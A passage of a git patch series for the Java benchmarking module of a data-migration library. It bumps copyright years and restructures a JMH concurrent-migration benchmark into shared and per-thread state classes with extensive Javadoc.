* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
index 2167a2d..a55b729 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
index 82b3d04..ad44bd4 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
@@ -23,7 +23,6 @@
package de.splatgames.aether.datafixers.benchmarks.codec;
import com.google.gson.JsonElement;
-import de.splatgames.aether.datafixers.api.codec.Codec;
import de.splatgames.aether.datafixers.api.codec.Codecs;
import de.splatgames.aether.datafixers.api.result.DataResult;
import de.splatgames.aether.datafixers.api.util.Pair;
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
index f402cf8..3afb77f 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
index e9f0129..2b3e535 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
index a8dbb42..0b72395 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
index 2ff7c49..e60fd60 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java
index 08423be..32b058f 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
index b725afa..0cd6961 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
index 545e222..5dcccb6 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
index 8d7107f..f618554 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
index 2959269..c387455 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java
index 64b89d4..38a13f3 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
index b20926e..7f48696 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java
index 90376fa..82fe8a3 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
From 28dc75834f336c2921a1697bea56eb085176df39 Mon Sep 17 00:00:00 2001
From: Erik
Date: Thu, 29 Jan 2026 21:26:16 +0100
Subject: [PATCH 22/39] Add concurrent benchmarking utilities and comprehensive
Javadoc for `ConcurrentMigrationBenchmark` to enhance multithreaded
performance analysis.
---
.../ConcurrentMigrationBenchmark.java | 566 +++++++++++++++---
.../benchmarks/concurrent/package-info.java | 130 ++++
2 files changed, 604 insertions(+), 92 deletions(-)
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/package-info.java
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
index 3afb77f..a1830bf 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
@@ -49,16 +49,106 @@
import org.openjdk.jmh.annotations.Warmup;
import org.openjdk.jmh.infra.Blackhole;
-import java.util.Random;
+import java.util.SplittableRandom;
import java.util.concurrent.TimeUnit;
/**
- * JMH benchmark for concurrent migration and registry access performance.
+ * JMH benchmark for concurrent DataFixer operations and thread-safety validation.
*
- *
Measures the thread-safety and contention characteristics of the
- * DataFixer and SchemaRegistry under concurrent load.
+ *
This benchmark measures the performance characteristics of the DataFixer system
+ * under concurrent load. It validates thread-safety of shared components and quantifies
+ * scalability across different thread counts. The results help identify contention
+ * points and ensure the framework performs well in multi-threaded environments.
+ *
+ *
Benchmark Categories
+ *
+ *
Concurrent Migration Benchmarks
+ *
Measure DataFixer performance when multiple threads perform migrations simultaneously:
+ *
+ *
{@link #concurrentSingleFix} - Maximum parallelism with single-fix migrations
+ *
{@link #concurrentChainMigration} - Maximum parallelism with 10-fix chain migrations
+ *
{@link #fourThreadMigration} - Fixed 4-thread migration for baseline comparison
+ *
{@link #eightThreadMigration} - Fixed 8-thread migration for scaling analysis
+ *
+ *
+ *
Concurrent Registry Access Benchmarks
+ *
Measure SchemaRegistry performance under concurrent read pressure:
+ *
+ *
{@link #concurrentRegistryLookup} - Random version lookups from multiple threads
*
* @author Erik Pförtner
+ * @see de.splatgames.aether.datafixers.benchmarks.core.SingleFixBenchmark
+ * @see de.splatgames.aether.datafixers.benchmarks.core.MultiFixChainBenchmark
+ * @see BenchmarkBootstrap
* @since 1.0.0
*/
@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
@@ -69,151 +159,443 @@
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
public class ConcurrentMigrationBenchmark {
- @Param({"SMALL", "MEDIUM"})
- private PayloadSize payloadSize;
-
- // Shared state across threads
- private DataFixer sharedFixer;
- private DataFixer sharedChainFixer;
- private SchemaRegistry sharedRegistry;
- private DataVersion fromVersion;
- private DataVersion toVersion;
- private DataVersion chainToVersion;
- private DataVersion[] registryVersions;
-
- @Setup(Level.Trial)
- public void setup() {
- // Create shared fixer (thread-safe after freeze)
- this.sharedFixer = BenchmarkBootstrap.createSingleFixFixer();
- this.sharedChainFixer = BenchmarkBootstrap.createChainFixer(10);
- this.fromVersion = new DataVersion(1);
- this.toVersion = new DataVersion(2);
- this.chainToVersion = new DataVersion(11);
-
- // Create shared registry
- final SimpleSchemaRegistry registry = new SimpleSchemaRegistry();
- this.registryVersions = new DataVersion[100];
- for (int i = 0; i < 100; i++) {
- final int version = (i + 1) * 10;
- this.registryVersions[i] = new DataVersion(version);
- registry.register(MockSchemas.minimal(version));
- }
- registry.freeze();
- this.sharedRegistry = registry;
- }
-
- /**
- * Per-thread state for independent test data.
- */
- @State(Scope.Thread)
- public static class ThreadState {
-
- private Dynamic threadInput;
- private Random random;
-
- @Setup(Level.Iteration)
- public void setup(final ConcurrentMigrationBenchmark parent) {
- // Each thread gets its own input data
- this.threadInput = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, parent.payloadSize);
- this.random = new Random();
- }
- }
-
- // ==================== Concurrent Migration ====================
+ // ==================== Concurrent Migration Benchmarks ====================
/**
- * Benchmarks concurrent single-fix migrations using all available processors.
+ * Benchmarks concurrent single-fix migrations with maximum thread parallelism.
*
- * @param state per-thread state
+ *
All available CPU threads simultaneously apply a single DataFix to their
+ * respective input data. This benchmark stress-tests the thread-safety of the
+ * DataFixer implementation and measures maximum achievable throughput.
+ *
+ *
Key aspects measured:
+ *
+ *
Lock contention in shared DataFixer instance
+ *
Memory allocation pressure under concurrent load
+ *
Cache coherency effects from shared schema access
+ *
+ *
+ * @param s shared benchmark state containing the DataFixer and versions
+ * @param t per-thread state containing isolated input data
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
@Threads(Threads.MAX)
- public void concurrentSingleFix(final ThreadState state, final Blackhole blackhole) {
- final Dynamic result = this.sharedFixer.update(
+ public void concurrentSingleFix(final BenchmarkState s,
+ final ThreadState t,
+ final Blackhole blackhole) {
+ final Dynamic result = s.sharedFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
- state.threadInput,
- this.fromVersion,
- this.toVersion);
+ t.threadInput,
+ s.fromVersion,
+ s.toVersion
+ );
blackhole.consume(result);
}
/**
- * Benchmarks concurrent chain migrations using all available processors.
+ * Benchmarks concurrent chain migrations with maximum thread parallelism.
+ *
+ *
All available CPU threads simultaneously apply a 10-fix chain migration.
+ * This benchmark combines the stress of concurrent access with the complexity
+ * of multi-step migrations, revealing performance characteristics under
+ * realistic high-load scenarios.
*
- * @param state per-thread state
+ *
Compared to {@link #concurrentSingleFix}, this benchmark:
Exercises fix ordering and version traversal logic concurrently
+ *
Creates higher memory allocation rates per thread
+ *
+ *
+ * @param s shared benchmark state containing the chain DataFixer
+ * @param t per-thread state containing isolated input data
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
@Threads(Threads.MAX)
- public void concurrentChainMigration(final ThreadState state, final Blackhole blackhole) {
- final Dynamic result = this.sharedChainFixer.update(
+ public void concurrentChainMigration(final BenchmarkState s,
+ final ThreadState t,
+ final Blackhole blackhole) {
+ final Dynamic result = s.sharedChainFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
- state.threadInput,
- this.fromVersion,
- this.chainToVersion);
+ t.threadInput,
+ s.fromVersion,
+ s.chainToVersion
+ );
blackhole.consume(result);
}
/**
- * Benchmarks concurrent migrations with 4 threads.
+ * Benchmarks migration performance with exactly 4 concurrent threads.
+ *
+ *
Provides a fixed-thread baseline for comparing against variable-thread
+ * benchmarks. Four threads represent a typical server core count and help
+ * establish scaling characteristics between single-threaded and maximum
+ * parallelism scenarios.
*
- * @param state per-thread state
+ *
Use this benchmark to:
+ *
+ *
Establish baseline concurrent performance on quad-core systems
+ *
Compare with {@link #eightThreadMigration} to measure scaling factor
+ *
Identify the point where adding threads provides diminishing returns
+ *
+ *
+ * @param s shared benchmark state containing the DataFixer
+ * @param t per-thread state containing isolated input data
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
@Threads(4)
- public void fourThreadMigration(final ThreadState state, final Blackhole blackhole) {
- final Dynamic result = this.sharedFixer.update(
+ public void fourThreadMigration(final BenchmarkState s,
+ final ThreadState t,
+ final Blackhole blackhole) {
+ final Dynamic result = s.sharedFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
- state.threadInput,
- this.fromVersion,
- this.toVersion);
+ t.threadInput,
+ s.fromVersion,
+ s.toVersion
+ );
blackhole.consume(result);
}
/**
- * Benchmarks concurrent migrations with 8 threads.
+ * Benchmarks migration performance with exactly 8 concurrent threads.
+ *
+ *
Tests scaling beyond the 4-thread baseline. Eight threads represent
+ * a common server configuration and help identify whether the DataFixer
+ * implementation scales efficiently with additional parallelism.
+ *
+ *
Scaling analysis:
+ *
+ *
2x throughput vs 4 threads: Perfect linear scaling
+ *
1.5-2x throughput: Good scaling with minor contention
+ *
<1.5x throughput: Contention limiting scalability
+ *
≤1x throughput: Severe contention; investigate locking
+ *
*
- * @param state per-thread state
+ * @param s shared benchmark state containing the DataFixer
+ * @param t per-thread state containing isolated input data
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
@Threads(8)
- public void eightThreadMigration(final ThreadState state, final Blackhole blackhole) {
- final Dynamic result = this.sharedFixer.update(
+ public void eightThreadMigration(final BenchmarkState s,
+ final ThreadState t,
+ final Blackhole blackhole) {
+ final Dynamic result = s.sharedFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
- state.threadInput,
- this.fromVersion,
- this.toVersion);
+ t.threadInput,
+ s.fromVersion,
+ s.toVersion
+ );
blackhole.consume(result);
}
- // ==================== Concurrent Registry Access ====================
+ // ==================== Concurrent Registry Access Benchmarks ====================
/**
- * Benchmarks concurrent schema registry lookups.
+ * Benchmarks concurrent random schema lookups from the registry.
+ *
+ *
All available threads perform random version lookups against a shared
+ * {@link SchemaRegistry} containing 100 schema versions. This benchmark
+ * validates the thread-safety and performance of registry read operations
+ * under heavy concurrent access.
+ *
+ *
The benchmark uses pre-computed random indices (via {@link ThreadState#nextRegistryIndex()})
+ * to avoid RNG contention affecting measurements. Each thread cycles through
+ * a 1024-element buffer of random indices.
*
- * @param state per-thread state
+ *
Performance expectations:
+ *
+ *
Registry lookups should be lock-free and scale linearly
+ *
Cache effects may cause variance based on version access patterns
+ *
No write contention since registry is frozen before benchmarking
+ *
+ *
+ * @param s shared benchmark state containing the registry and versions
+ * @param t per-thread state providing random index sequence
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
@Threads(Threads.MAX)
- public void concurrentRegistryLookup(final ThreadState state, final Blackhole blackhole) {
- final int index = state.random.nextInt(this.registryVersions.length);
- final Schema schema = this.sharedRegistry.get(this.registryVersions[index]);
+ public void concurrentRegistryLookup(final BenchmarkState s,
+ final ThreadState t,
+ final Blackhole blackhole) {
+ final int index = t.nextRegistryIndex();
+ final Schema schema = s.sharedRegistry.get(s.registryVersions[index]);
blackhole.consume(schema);
}
/**
- * Benchmarks concurrent latest schema access.
+ * Benchmarks concurrent latest-schema lookups from the registry.
+ *
+ *
All available threads repeatedly call {@link SchemaRegistry#latest()}
+ * on a shared registry. This represents the "hot path" optimization where
+ * applications frequently need the most recent schema version.
+ *
+ *
This benchmark helps validate:
+ *
+ *
Caching effectiveness for the latest schema reference
+ *
Memory visibility of the cached latest schema across threads
+ *
Absence of unnecessary synchronization on read-only access
+ *
*
+ *
Expected to outperform {@link #concurrentRegistryLookup} due to:
+ *
+ *
No version-to-schema map lookup required
+ *
Single cached reference rather than computed lookup
+ *
Better CPU cache utilization from accessing same memory location
+ *
+ *
+ * @param s shared benchmark state containing the registry
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
@Threads(Threads.MAX)
- public void concurrentLatestLookup(final Blackhole blackhole) {
- final Schema schema = this.sharedRegistry.latest();
+ public void concurrentLatestLookup(final BenchmarkState s,
+ final Blackhole blackhole) {
+ final Schema schema = s.sharedRegistry.latest();
blackhole.consume(schema);
}
+
+ // ==================== State Classes ====================
+
+ /**
+ * Shared benchmark state accessible by all threads.
+ *
+ *
This state class contains all resources that are shared across benchmark
+ * threads, simulating real-world scenarios where a single DataFixer instance
+ * serves multiple concurrent requests.
+ *
+ *
State initialization occurs once per trial (before warmup begins) to
+ * ensure consistent starting conditions across all measurement iterations.
+ *
+ *
Shared Resources
+ *
+ *
{@link #sharedFixer} - Single-fix DataFixer for basic migration benchmarks
+ *
{@link #sharedChainFixer} - 10-fix chain DataFixer for chain migration benchmarks
+ *
{@link #sharedRegistry} - Frozen SchemaRegistry with 100 versions for lookup benchmarks
+ *
Version constants - Pre-computed DataVersion instances to avoid allocation during measurement
+ *
+ */
+ @State(Scope.Benchmark)
+ public static class BenchmarkState {
+
+ /**
+ * The payload size parameter, injected by JMH.
+ *
+ *
Controls the complexity of generated test data for each thread.
+ * Only SMALL and MEDIUM sizes are used to balance benchmark runtime
+ * with meaningful performance differentiation.
+ *
+ * @see PayloadSize
+ */
+ @Param({"SMALL", "MEDIUM"})
+ public PayloadSize payloadSize;
+
+ /**
+ * Shared DataFixer configured with a single fix (v1 → v2).
+ *
+ *
Used by migration benchmarks that measure basic concurrent
+ * fix application without chain traversal overhead.
+ */
+ public DataFixer sharedFixer;
+
+ /**
+ * Shared DataFixer configured with a 10-fix chain (v1 → v11).
+ *
+ *
Used by {@link #concurrentChainMigration} to measure concurrent
+ * performance when applying multiple sequential fixes.
The registry is frozen after population to ensure thread-safe
+ * read access during benchmarks. Versions range from 10 to 1000
+ * in increments of 10.
+ */
+ public SchemaRegistry sharedRegistry;
+
+ /**
+ * Source version for all migrations (v1).
+ */
+ public DataVersion fromVersion;
+
+ /**
+ * Target version for single-fix migrations (v2).
+ */
+ public DataVersion toVersion;
+
+ /**
+ * Target version for chain migrations (v11).
+ */
+ public DataVersion chainToVersion;
+
+ /**
+ * Pre-computed DataVersion array for registry lookup benchmarks.
+ *
+ *
Contains 100 versions (10, 20, 30, ..., 1000) matching the
+ * schemas registered in {@link #sharedRegistry}. Pre-allocation
+ * avoids DataVersion object creation during measurement.
+ */
+ public DataVersion[] registryVersions;
+
+ /**
+ * Initializes all shared benchmark state.
+ *
+ *
Creates DataFixer instances, populates the SchemaRegistry with
+ * 100 versions, and pre-computes all version constants. The registry
+ * is frozen after population to enable lock-free concurrent reads.
+ */
+ @Setup(Level.Trial)
+ public void setup() {
+ this.sharedFixer = BenchmarkBootstrap.createSingleFixFixer();
+ this.sharedChainFixer = BenchmarkBootstrap.createChainFixer(10);
+
+ this.fromVersion = new DataVersion(1);
+ this.toVersion = new DataVersion(2);
+ this.chainToVersion = new DataVersion(11);
+
+ final SimpleSchemaRegistry registry = new SimpleSchemaRegistry();
+ this.registryVersions = new DataVersion[100];
+ for (int i = 0; i < 100; i++) {
+ final int version = (i + 1) * 10;
+ this.registryVersions[i] = new DataVersion(version);
+ registry.register(MockSchemas.minimal(version));
+ }
+ registry.freeze();
+ this.sharedRegistry = registry;
+ }
+ }
+
+ /**
+ * Per-thread benchmark state for isolated data and random access patterns.
+ *
+ *
This state class provides each benchmark thread with its own input data
+ * and random number generator to eliminate false sharing and contention on
+ * thread-local operations.
+ *
+ *
Design Rationale
+ *
+ *
Thread-local input: Each thread operates on its own Dynamic instance,
+ * preventing write contention and ensuring independent GC behavior
+ *
SplittableRandom: Faster and contention-free compared to
+ * {@link java.util.Random} which uses atomic CAS operations
+ *
Pre-computed indices: Random registry indices are generated during
+ * setup to avoid RNG overhead during measurement
+ *
+ *
+ *
Index Buffer Strategy
+ *
The {@link #registryIndexBuffer} uses a power-of-two size (1024) with
+ * bitwise AND masking for efficient wraparound without modulo operations.
+ * This provides pseudo-random access patterns while minimizing measurement
+ * overhead.
+ */
+ @State(Scope.Thread)
+ public static class ThreadState {
+
+ /**
+ * Size of the pre-computed random index buffer.
+ *
+ *
Power of two (1024) enables efficient wraparound via bitwise AND.
+ * Large enough to avoid pattern repetition affecting cache behavior
+ * during typical measurement windows.
+ */
+ private static final int INDEX_BUFFER_SIZE = 1024;
+
+ /**
+ * Bitmask for efficient modulo operation on buffer index.
+ *
+ *
Used as {@code cursor & INDEX_MASK} instead of {@code cursor % INDEX_BUFFER_SIZE}
+ * for faster wraparound calculation.
+ */
+ private static final int INDEX_MASK = INDEX_BUFFER_SIZE - 1;
+
+ /**
+ * Pre-computed random indices for registry lookup benchmarks.
+ *
+ *
Populated during iteration setup with random values in range
+ * [0, registryVersions.length). Accessed via {@link #nextRegistryIndex()}.
+ */
+ private final int[] registryIndexBuffer = new int[INDEX_BUFFER_SIZE];
+
+ /**
+ * Per-thread input data for migration benchmarks.
+ *
+ *
Regenerated at each iteration to ensure consistent memory allocation
+ * patterns and prevent cross-iteration caching effects.
+ */
+ public Dynamic threadInput;
+
+ /**
+ * Current position in the {@link #registryIndexBuffer}.
+ *
+ *
Incremented on each call to {@link #nextRegistryIndex()} and
+ * wrapped using {@link #INDEX_MASK}.
+ */
+ private int registryCursor;
+
+ /**
+ * Per-thread random number generator.
+ *
+ *
{@link SplittableRandom} is used instead of {@link java.util.Random}
+ * because it is faster and does not use atomic operations, eliminating
+ * contention when multiple threads generate random numbers.
+ */
+ private SplittableRandom random;
+
+ /**
+ * Initializes the per-thread random number generator.
+ *
+ *
Called once per trial. Uses a fixed seed (42) for reproducibility
+ * across benchmark runs, though each thread will produce different
+ * sequences due to {@link SplittableRandom}'s splittable nature.
+ */
+ @Setup(Level.Trial)
+ public void setupTrial() {
+ // Per-thread RNG avoids contention and is faster than java.util.Random.
+ this.random = new SplittableRandom(42L);
+ }
+
+ /**
+ * Regenerates input data and random indices for each iteration.
+ *
+ *
Fresh data generation per iteration ensures:
+ *
+ *
Consistent GC pressure across iterations
+ *
No JIT over-optimization on specific data patterns
+ *
Independent memory allocation per thread
+ *
+ *
+ *
The random index buffer is refilled with new random values to
+ * vary the registry access pattern across iterations.
+ *
+ * @param s the shared benchmark state providing payload size and version array
+ */
+ @Setup(Level.Iteration)
+ public void setupIteration(final BenchmarkState s) {
+ this.threadInput = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, s.payloadSize);
+
+ for (int i = 0; i < INDEX_BUFFER_SIZE; i++) {
+ this.registryIndexBuffer[i] = this.random.nextInt(s.registryVersions.length);
+ }
+ this.registryCursor = 0;
+ }
+
+ /**
+ * Returns the next pre-computed random index for registry lookups.
+ *
+ *
Retrieves the next value from {@link #registryIndexBuffer} and
+ * advances the cursor with efficient bitwise wraparound. This method
+ * is called during measurement and is optimized to minimize overhead.
+ *
+ * @return a random index in range [0, registryVersions.length)
+ */
+ public int nextRegistryIndex() {
+ return this.registryIndexBuffer[this.registryCursor++ & INDEX_MASK];
+ }
+ }
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/package-info.java
new file mode 100644
index 0000000..9b374ee
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/package-info.java
@@ -0,0 +1,130 @@
+/*
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
